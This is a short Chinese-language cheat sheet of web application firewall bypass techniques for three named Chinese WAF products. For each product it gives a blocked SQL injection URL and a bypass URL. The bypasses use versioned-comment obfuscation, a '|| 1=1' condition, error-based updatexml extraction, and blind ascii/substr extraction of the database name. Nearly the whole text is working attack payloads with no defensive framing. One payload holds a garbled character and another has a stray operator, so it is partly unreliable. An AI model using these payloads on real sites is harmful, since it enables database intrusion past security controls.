绕WAF手法总结

云锁

被拦截

http://www.test123.com/article.php?id=1%20union%20select%201,2,3

绕过

http://www.test123.com/article.php?id=-1/*!36000union*//*!36000distinct*//*!36000select*/1,2,user()

360websec

被拦截

http://www.xxx.com.cn/productshow.php?id=79'

绕过

http://www.xxx.com.cn/productshow.php?id=79 \|\| 1=1

WTSWAF

被拦截

http://www.xxx.com.cn/productshow.php?id=-79 \|\| updatexml(1,concat(0x7e,(sElEct�user()),0x7e),1)

绕过

http://www.xxx.com.cn/productshow.php?id=-79 \|\| and (ascii(substr(database(),1,1))%20=109)